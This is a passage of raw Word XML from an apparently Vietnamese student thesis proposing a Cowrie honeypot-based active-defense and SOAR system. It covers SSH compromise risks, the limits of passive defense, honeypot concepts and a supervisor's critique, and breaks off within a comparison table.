        <w:t>Hậu quả của việc máy chủ SSH bị xâm phạm là vô cùng thảm khốc: kẻ tấn công ngay lập tức biến máy chủ nạn nhân thành một bàn đạp nội bộ (Pivot point) để leo thang đặc quyền (Privilege Escalation), cài cắm mã độc đào tiền ảo (Cryptocurrency Miner), đánh cắp dữ liệu kinh doanh quan trọng, triển khai mã độc tống tiền (Ransomware), hoặc tuyển mộ máy chủ đó vào mạng lưới botnet để phát động các đợt tấn công từ chối dịch vụ phân tán (DDoS) quy mô terabit nhằm vào các hạ tầng trọng yếu khác.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.2 Sự bế tắc của Mô hình Phòng thủ Thụ động (Passive Defense) truyền thống</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong nhiều thập kỷ qua, các chiến lược bảo mật mạng chủ yếu dựa trên triết lý 'Phòng thủ chu vi thụ động' (Passive Perimeter Defense) với các thành phần cốt lõi bao gồm Tường lửa trạng thái (Stateful Firewall), Hệ thống Phát hiện và Ngăn chặn Xâm nhập (IDS/IPS như Snort, Suricata) và phần mềm phòng chống brute-force cơ bản (như Fail2ban). Tuy nhiên, trước các chiến dịch tấn công phân tán quy mô lớn và đa hình của tội phạm mạng hiện đại, mô hình phòng thủ thụ động này đã bộc lộ những điểm nghẽn nghiêm trọng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thứ nhất, vấn đề 'Bội thực cảnh báo giả' (Alert Fatigue): Các hệ thống IDS truyền thống dựa vào chữ ký tĩnh (Signature-based) liên tục sinh ra hàng chục nghìn cảnh báo mỗi ngày đối với các lưu lượng quét mạng thông thường. Chuyên viên an ninh tại các trung tâm điều hành SOC không thể nào rà soát hết lượng cảnh báo khổng lồ này, dẫn đến việc bỏ sót các cuộc tấn công thực sự nguy hiểm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thứ hai, độ trễ phản ứng quá lớn (High Response Latency): Quy trình xử lý sự cố truyền thống phụ thuộc hoàn toàn vào con người (SOC Tier 1 Analyst). Từ khi hệ thống phát hiện có IP tấn công brute-force, chuyên viên phải kiểm tra thủ công log, tra cứu WHOIS, xác minh địa chỉ IP, sau đó mới truy cập vào firewall để thêm luật chặn IP đó. Toàn bộ chu trình này mất trung bình từ 15 đến 30 phút. Trong khoảng thời gian đó, kẻ tấn công đã có thể đoán trúng mật khẩu yếu hoặc khai thác thành công lỗ hổng bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thứ ba, sự thiếu hụt thông tin tình báo đối phương (Adversarial Intelligence Blindspot): Phòng thủ thụ động chỉ biết chặn và bỏ qua (Drop/Reject packet). Hệ thống hoàn toàn 'mù' về động cơ của kẻ tấn công: Kẻ tấn công là ai? Chúng đến từ đâu? Sau khi vào được hệ thống thì chúng gõ những lệnh gì? Chúng đang tìm kiếm tài liệu nào? Những mã độc nào được chúng chuẩn bị tải lên? Việc thiếu vắng hoàn toàn các dữ liệu TTPs (Tactics, Techniques, and Procedures) này khiến đội ngũ phòng thủ luôn ở vị thế đi sau kẻ tấn công một bước.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.3 Khái niệm Công nghệ Bẫy Honeypot và Sự dịch chuyển sang Phòng thủ Chủ động (Active Defense)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để khắc phục sự mù mờ về thông tin của phòng thủ thụ động, công nghệ Bẫy (Honeypot) đã ra đời như một bước tiến quan trọng. Honeypot là một tài nguyên công nghệ thông tin được thiết kế và triển khai với mục đích duy nhất: trở thành một chiếc bẫy mồi nhử để kẻ tấn công xâm nhập và tương tác, trong khi toàn bộ hành vi, tổ hợp phím gõ, kịch bản khai thác và mã độc của đối phương đều bị ghi lại một cách bí mật và toàn vẹn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong lĩnh vực giám sát dịch vụ SSH/Telnet, Cowrie được đánh giá là một trong những giải pháp Medium-Interaction Honeypot mã nguồn mở hàng đầu thế giới. Cowrie cung cấp một shell dòng lệnh ảo hóa hoàn hảo, giả lập hệ điều hành Linux Debian/Ubuntu với đầy đủ hệ thống tệp tin (filesystem), hỗ trợ các lệnh phổ biến (ls, cd, cat, wget, curl, ps, uname), cho phép ghi lại chi tiết từng phiên kết nối và tự động lưu giữ các payload mã độc mà kẻ tấn công tải lên máy bẫy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tuy nhiên, xu hướng phòng thủ hiện đại trên thế giới không còn dừng lại ở việc 'ngồi im chịu trận để thu thập log'. Các tổ chức nghiên cứu bảo mật hàng đầu như MITRE (với khung chiến lược MITRE Shield và MITRE Engage) đã khởi xướng cuộc cách mạng mang tên 'Phòng thủ Chủ động' (Active Defense &amp; Active Deception). Phòng thủ chủ động là sự kết hợp đồng bộ giữa:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Đánh lừa có chủ đích (Deception Operations): Dẫn dụ kẻ tấn công vào ma trận các thông tin giả mạo (Fake credentials, Canary Tokens), buộc đối phương phải tốn thời gian, công sức và nguồn lực vào những mục tiêu không có thật.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Trinh sát ngược (Reverse Reconnaissance): Ngay khi kẻ tấn công chạm vào bẫy, hệ thống lập tức kích hoạt các công cụ thu thập thông tin tình báo đối phương (OSINT, rà soát dịch vụ, phân tích chữ ký công cụ tấn công) để vẽ nên hồ sơ đầy đủ về kẻ địch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Tự động hóa phản ứng sự cố (SOAR): Đồng bộ hóa quy trình phát hiện, phân tích và ngăn chặn trong vòng vài giây mà không cần sự can thiệp thủ công của con người.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.4 Phân tích và Giải quyết Nhận xét của Giảng viên: 'Vượt qua Giới hạn Cài đặt Ứng dụng Bề nổi'</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>📌 LỜI CẢNH BÁO MANG TÍNH BƯỚC NGOẶT CỦA GIẢNG VIÊN HƯỚNG DẪN:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Lời nhận xét của Giảng viên: 'Nếu chỉ đơn thuần là cài đặt Cowrie Honeypot theo hướng dẫn có sẵn trên mạng, sau đó viết một vài dòng script đọc file cowrie.json và bắn tin nhắn thông báo vào Telegram Bot khi có ai đăng nhập, thì đây chỉ là mức độ Cài đặt và Ứng dụng công cụ có sẵn (Script-kiddie / Application Configuration Level), hoàn toàn thiếu hàm lượng nghiên cứu khoa học, không có đóng góp về mặt kỹ thuật kỹ sư và chắc chắn không thể đạt điểm giỏi/xuất sắc.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="312" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Đây là một nhận xét vô cùng xác đáng và mang tính chuẩn mực học thuật cao đối với một đồ án chuyên ngành An toàn thông tin. Nhận xét này đã bóc tách rõ ràng hai mức độ tiếp cận đề tài:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Ở cách tiếp cận cũ (Mức 1 - Cài đặt ứng dụng): Sinh viên tải Cowrie về bằng lệnh git clone, chạy docker-compose up, mở file log và viết 20 dòng code Python sử dụng thư viện requests để đẩy dòng chữ 'Có IP 1.2.3.4 đang tấn công' lên một nhóm chat. Cách làm này không giải quyết được bất kỳ bài toán cốt lõi nào của SOC: Không có bộ lọc tương quan (Correlation), không có khả năng chống chọi với bão cảnh báo (Alert Flooding), không ánh xạ được kỹ thuật tấn công theo tiêu chuẩn quốc tế, không có hành động ngăn chặn tự động, và đặc biệt là hoàn toàn bị động trước kẻ tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để vượt qua giới hạn đó và nâng tầm đề tài lên Mức độ 2 (Kỹ thuật Kỹ sư &amp; Nghiên cứu Khoa học Chủ động), đồ án này đã tái cấu trúc toàn diện bài toán và xây dựng một Hệ sinh thái Active Defense &amp; SOAR Ecosystem với 5 giá trị kỹ thuật vượt trội được thể hiện trong Bảng 1.1 dưới đây:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Bảng 1.1: So sánh sự khác biệt bản chất giữa Cài đặt Ứng dụng Bề nổi và Hệ thống Active Defense Đồ án</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tiêu chí Đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mô hình Cài đặt Bề nổi (Bị Thầy chê)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Hệ sinh thái Active Defense &amp; SOAR (Đồ án đề xuất)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bản chất Kiến trúc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Chỉ cài Cowrie đơn lẻ và script thông báo tĩnh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Kiến trúc Mini-SOC 5 phân lớp hoàn chỉnh, tương tác đa thành phần.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Cơ chế Xử lý Log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Đọc log tuyến tính, gửi tin nhắn thô liên tục (Spam).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bộ phân tích luồng JSON bất đồng bộ (Streaming Event Engine).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Động cơ Tương quan (Correlation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Không có. Một sự kiện failed login cũng gửi alert.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Correlation Engine tự phát triển, ánh xạ tự động ma trận MITRE ATT&amp;CK.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Mức độ Tương tác Cảnh báo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Thông báo 1 chiều tĩnh (Plain text notification).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Thẻ cảnh báo trực quan + Inline Buttons tương tác 2 chiều (Chặn, Quét, Tarpit).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Khả năng Trinh sát Ngược (OSINT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
